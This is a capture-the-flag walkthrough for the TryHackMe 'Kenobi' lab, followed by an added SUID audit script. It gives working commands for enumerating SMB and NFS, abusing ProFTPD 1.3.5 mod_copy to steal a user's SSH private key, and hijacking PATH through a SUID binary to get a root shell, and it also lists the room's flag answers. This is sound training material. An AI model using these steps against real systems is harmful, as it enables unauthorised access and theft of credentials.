# Kenobi THM

Performed by: jb-williams
## Deploy the vulnerable machine

### Scan the machine with nmap, how many ports are open?

- Deploy the machine and scan it with nmap:

```
nmap -v -p- -sV -sC -T4 -oA nmap/initial 10.10.223.56 && grep -i "open" nmap/initial.nmap | cut -d' ' -f 1 | cut -d'/' -f1 | tee nmap/ports.txt | wc -l
```

Note: you may get some false positives that show up with an unknown service; ignore them.

- Answer (number of open ports): `7`
## Enumerating Samba for shares

### Using the nmap command above, how many shares have been found?

- The previous nmap scan shows the SMB service running; the room points this out and suggests enumerating the shares with nmap scripts.
- SMB (usually) uses ports `445` and `139`.
- You can enumerate SMB with this nmap command and these scripts:

```
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.223.56
```

- Answer: `3`
### Once you're connected, list the files on the share. What is the file you can see?

- The scripts show an `anonymous` share.
- Attempt to log in to the share with a blank password:

```
smbclient //10.10.223.56/anonymous
```

- To list the files run the `ls` command.
- While logged in you can download that file with:

```
get log.txt
```

- Or you can download recursively without an interactive login:

```
smbget -R smb://10.10.223.56/anonymous
```

- Answer: `log.txt`
### What port is FTP running on?

- Reading the `log.txt` file shows which port the FTP service is running on.
- Answer: `21`
### What mount can we see?

- Going back to our nmap scan for open ports, we can see RPC running on port 111 (in this case), and we can enumerate that service further with nmap:

```
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.223.56
```

- Answer: `/var`
## Gain initial access with ProFtpd

### What is the version?

- With `netcat` you can do a quick connect to read the banner and find the version of ProFTPD running:

```
nc 10.10.223.56 21
```

- Answer: `1.3.5`
### How many exploits are there for the ProFTPD running?

- You can quickly check for known vulnerabilities with `searchsploit`:

```
searchsploit proftpd 1.3.5
```

- Answer: `4`
### What is Kenobi's user flag (/home/kenobi/user.txt)?

- We see from searchsploit that there is a `mod_copy` vulnerability in ProFTPD.
- From `log.txt` we know there is an SSH key created for the `kenobi` user.
- So, let's try to copy `kenobi`'s SSH key into the mountable directory:

```
nc 10.10.223.56 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.223.56]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
^C
```

- Earlier, with the scan on port 111, we saw that there is a mount point at `/var`, and we just copied the SSH key into that directory tree.
- Let's mount the `/var` directory on our machine:

```
mkdir /mnt/kenobiNFS
mount 10.10.223.56:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS
```

- Now we can traverse `/mnt/kenobiNFS` and/or just copy the key out, and use kenobi's private key to log in as that user:

```
cp /mnt/kenobiNFS/tmp/id_rsa .
sudo chmod 600 id_rsa
ssh -i id_rsa kenobi@10.10.223.56
```

- Answer: `d0b0f3f53b6caa532a83915e19224899`
## Privilege Escalation with Path Variable Manipulation

### What file looks particularly out of the ordinary?

- The room gives some information about SUID binaries and explains that they can be used to escalate privileges.
- Using their command, try to find the file that looks out of the ordinary. (I have used my own machine as a reference several times.)

```
find / -perm -u=s -type f 2>/dev/null
```

- Answer: `/usr/bin/menu`

### Run the binary, how many options appear?

- Answer: `3`
### What is the root flag (/root/root.txt)?

- Looking at the binary with `ls -la /usr/bin/menu` shows that it is owned by root and has the SUID bit set, so it runs with root privileges.
- Running `strings /usr/bin/menu` shows that the commands it calls are not invoked by absolute path, so we may be able to exploit this.
- We are going to write a `/tmp/curl` file that launches `/bin/bash`, make it executable, and then modify `$PATH` so our file is found before the real `curl`:

```
echo /bin/bash > /tmp/curl
chmod 777 /tmp/curl
export PATH=/tmp:$PATH
```

- Then run `/usr/bin/menu` again and choose option `1`, which uses curl; it will place you in a privileged bash shell.
- Answer: `177b3cd8562289f37382721c28381f02`
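The defect this step relies on, a SUID binary calling `curl` by bare name rather than by absolute path, is something an administrator can audit for before anyone else does. The script below is an added example and is not part of this walkthrough or of the TryHackMe room; the list of command names it searches for is an assumption, and it extracts strings with `tr` rather than `strings(1)` so it runs on minimal hosts too.

```shell
#!/bin/sh
# Added audit helper, not part of the original walkthrough: list SUID binaries and
# flag any whose embedded strings invoke a command by bare name (no leading '/'),
# the defect that makes /usr/bin/menu hijackable through $PATH.

# Commands a SUID helper might shell out to. This list is an assumption, not
# taken from the room; extend it for your environment.
CMDS='curl|wget|uname|ifconfig|ip|cat|ls|id|ps|netstat|sh|bash'

# Print printable strings in FILE that begin with one of CMDS as a bare word.
# Absolute invocations such as "/usr/bin/curl -I localhost" are not reported.
# Uses tr instead of strings(1) so it also works where binutils is absent.
relative_cmds() {
  tr -c '[:print:]' '\n' < "$1" | grep -E "^($CMDS)( |\$)" || true
}

# Number of flagged strings in FILE (0 when the binary is clean).
relative_cmd_count() {
  relative_cmds "$1" | awk 'END { print NR }'
}

# Walk every SUID file on the host and report the flagged strings under its path.
# Each hit is a candidate for remediation: hard-code the full path in the
# program, or remove the SUID bit if the binary does not need it.
audit_suid() {
  find / -perm -u=s -type f 2>/dev/null | while read -r f; do
    hits=$(relative_cmds "$f")
    if [ -n "$hits" ]; then
      printf '%s\n%s\n\n' "$f" "$hits"
    fi
  done
}

# Scan the live system only when asked, so the functions can also be sourced.
if [ "${1:-}" = "--scan" ]; then
  audit_suid
fi
```

Run it as root with `sh audit_suid.sh --scan`; any binary it reports should have its command invocations pinned to full paths or its SUID bit removed.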
Written and performed by jb-williams (GitHub)
2023-04-12 12:25